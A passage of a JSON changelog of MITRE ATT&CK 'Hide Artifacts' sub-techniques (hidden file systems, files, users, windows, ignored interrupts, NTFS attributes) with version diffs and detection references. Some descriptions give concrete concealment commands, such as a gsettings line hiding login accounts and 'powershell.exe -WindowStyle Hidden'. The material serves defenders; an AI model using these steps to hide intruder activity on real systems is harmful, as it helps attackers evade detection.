nowrap=\"nowrap\">e&nbsp;[Security&nbsp;Software&nbsp;Discovery](https://attack.mitre.org/tec</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecurity&nbsp;Software&nbsp;Discovery](https://attack.mitre.org/techniq</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hniques/T1518/001)&nbsp;and&nbsp;other&nbsp;[Discovery](https://attack.mitr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ues/T1518/001)&nbsp;and&nbsp;other&nbsp;[Discovery](https://attack.mitre.or</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">org/tactics/TA0043)&nbsp;activities&nbsp;to&nbsp;both&nbsp;discover&nbsp;and&nbsp;verify&nbsp;e</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tactics/TA0043)&nbsp;activities&nbsp;to&nbsp;both&nbsp;discover&nbsp;and&nbsp;verify&nbsp;exist</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xisting&nbsp;exclusions&nbsp;in&nbsp;a&nbsp;victim&nbsp;environment.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;exclusions&nbsp;in&nbsp;a&nbsp;victim&nbsp;environment.</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0051: Detection Strategy for File/Path Exclusions"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-28 22:55:55.719000+00:00",
                    "modified": "2026-04-15 20:22:45.621000+00:00",
                    "name": "Hidden File System",
                    "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/005",
                            "external_id": "T1564.005"
                        },
                        {
                            "source_name": "FireEye Bootkits",
                            "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
                            "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html"
                        },
                        {
                            "source_name": "ESET ComRAT May 2020",
                            "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf"
                        },
                        {
                            "source_name": "MalwareTech VFS Nov 2014",
                            "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.",
                            "url": "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html"
                        },
                        {
                            "source_name": "Kaspersky Equation QA",
                            "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.",
                            "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:22:45.621000+00:00\", \"old_value\": \"2025-10-24 17:49:29.855000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0461: Detection Strategy for Hidden File System Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-26 17:46:13.128000+00:00",
                    "modified": "2026-04-15 20:23:13.914000+00:00",
                    "name": "Hidden Files and Directories",
                    "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls \u2013a</code> for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdditionally, adversaries may name files in a manner that would allow the file to be hidden such as naming a file only a \u201cspace\u201d character.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/001",
                            "external_id": "T1564.001"
                        },
                        {
                            "source_name": "WireLurker",
                            "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.",
                            "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
                        },
                        {
                            "source_name": "Sofacy Komplex Trojan",
                            "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
                            "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
                        },
                        {
                            "source_name": "Antiquated Mac Malware",
                            "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.",
                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Gr@ve_Rose (tcpdump101.com on bsky)"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:23:13.914000+00:00\", \"old_value\": \"2025-10-24 17:49:34.244000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0032: Detection Strategy for Hidden Files and Directories"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 20:12:40.876000+00:00",
                    "modified": "2026-04-15 20:23:44.205000+00:00",
                    "name": "Hidden Users",
                    "description": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. \n\nIn macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a user\u2019s home folder by changing the <code>chflags</code> to hidden.(Citation: Apple Support Hide a User Account) \n\nAdversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)\n\nOn Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/002",
                            "external_id": "T1564.002"
                        },
                        {
                            "source_name": "Cybereason OSX Pirrit",
                            "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.",
                            "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"
                        },
                        {
                            "source_name": "Apple Support Hide a User Account",
                            "description": "Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.",
                            "url": "https://support.apple.com/en-us/HT203998"
                        },
                        {
                            "source_name": "FireEye SMOKEDHAM June 2021",
                            "description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate\u2019s Supply Chain Software Compromise. Retrieved September 22, 2021.",
                            "url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"
                        },
                        {
                            "source_name": "Hide GDM User Accounts",
                            "description": "Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.",
                            "url": "https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/"
                        },
                        {
                            "source_name": "US-CERT TA18-074A",
                            "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.",
                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Omkar Gudhate"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:23:44.205000+00:00\", \"old_value\": \"2025-10-24 17:49:05.113000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1028: Operating System Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0353: Detection Strategy for Hidden User Accounts"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 20:26:49.433000+00:00",
                    "modified": "2026-04-15 20:23:51.965000+00:00",
                    "name": "Hidden Window",
                    "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)\n\nOn macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nSimilarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)\n\nThe Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\\Console\\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.(Citation: Cantoris Computing)\n\nIn addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.\n\nAdversaries may also leverage cmd.exe(Citation: Cybereason - Hidden Malicious Remote Access) as a parent process, and then utilize a LOLBin, such as DeviceCredentialDeployment.exe,(Citation: LOLBAS Project GitHub Device Cred Dep)(Citation: SecureList BlueNoroff Device Cred Dev) to hide windows.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/003",
                            "external_id": "T1564.003"
                        },
                        {
                            "source_name": "Cantoris Computing",
                            "description": "Cantoris. (2016, July 22). PowerShell Malware. Retrieved December 12, 2024.",
                            "url": "https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/"
                        },
                        {
                            "source_name": "Cybereason - Hidden Malicious Remote Access",
                            "description": "Cybereason Security Services Team. (n.d.). Behind Closed Doors: The Rise of Hidden Malicious Remote Access. Retrieved July 22, 2025.",
                            "url": "https://www.cybereason.com/blog/behind-closed-doors-the-rise-of-hidden-malicious-remote-access"
                        },
                        {
                            "source_name": "LOLBAS Project GitHub Device Cred Dep",
                            "description": "Elliot Killick. (n.d.). /DeviceCredentialDeployment.exe. Retrieved July 22, 2025.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"
                        },
                        {
                            "source_name": "Hidden VNC",
                            "description": "Hutchins, Marcus. (2015, September 13). Hidden VNC for Beginners. Retrieved November 28, 2023.",
                            "url": "https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html"
                        },
                        {
                            "source_name": "Anatomy of an hVNC Attack",
                            "description": "Keshet, Lior. Kessem, Limor. (2017, January 25). Anatomy of an hVNC Attack. Retrieved November 28, 2023.",
                            "url": "https://securityintelligence.com/anatomy-of-an-hvnc-attack/"
                        },
                        {
                            "source_name": "SecureList BlueNoroff Device Cred Dev",
                            "description": "Seongsu Park. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved July 22, 2025.",
                            "url": "https://securelist.com/bluenoroff-methods-bypass-motw/108383/"
                        },
                        {
                            "source_name": "Antiquated Mac Malware",
                            "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.",
                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
                        },
                        {
                            "source_name": "PowerShell About 2019",
                            "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.",
                            "url": "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Liran Ravich, CardinalOps",
                        "Mark Tsipershtein",
                        "Travis Smith, Tripwire",
                        "Vijay Lalwani"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:23:51.965000+00:00\", \"old_value\": \"2025-10-24 17:49:23.485000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1033: Limit Software Installation",
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0128: Detection Strategy for Hidden Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-08-24 17:23:34.470000+00:00",
                    "modified": "2026-04-15 20:24:37.027000+00:00",
                    "name": "Ignore Process Interrupts",
                    "description": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man)  These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. \n\nAdversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n\nHiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/011",
                            "external_id": "T1564.011"
                        },
                        {
                            "source_name": "Linux Signal Man",
                            "description": "Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023.",
                            "url": "https://man7.org/linux/man-pages/man7/signal.7.html"
                        },
                        {
                            "source_name": "nohup Linux Man",
                            "description": "Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023.",
                            "url": "https://linux.die.net/man/1/nohup"
                        },
                        {
                            "source_name": "Microsoft PowerShell SilentlyContinue",
                            "description": "Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023.",
                            "url": "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Viren Chaudhari, Qualys"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:24:37.027000+00:00\", \"old_value\": \"2025-04-15 22:41:11.807000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0067: Detection Strategy for Ignore Process Interrupts"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 20:33:00.009000+00:00",
                    "modified": "2026-04-15 20:24:50.745000+00:00",
                    "name": "NTFS File Attributes",
                    "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/004",
                            "external_id": "T1564.004"
                        },
                        {
                            "source_name": "MalwareBytes ADS July 2015",
                            "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.",
                            "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/"
                        },
                        {
                            "source_name": "SpectorOps Host-Based Jul 2017",
                            "description": "Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.",
                            "url": "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea"
                        },
                        {
                            "source_name": "Journey into IR ZeroAccess NTFS EA",
                            "description": "Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.",
                            "url": "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html"
                        },
                        {
                            "source_name": "Microsoft NTFS File Attributes Aug 2010",
                            "description": "Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.",
                            "url": "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/"
                        },
                        {
                            "source_name": "Microsoft ADS Mar 2014",
                            "description": "Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.",
                            "url": "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/"
                        },
                        {
                            "source_name": "Microsoft File Streams",
                            "description": "Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Oddvar Moe, @oddvarmoe",
                        "Red Canary"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
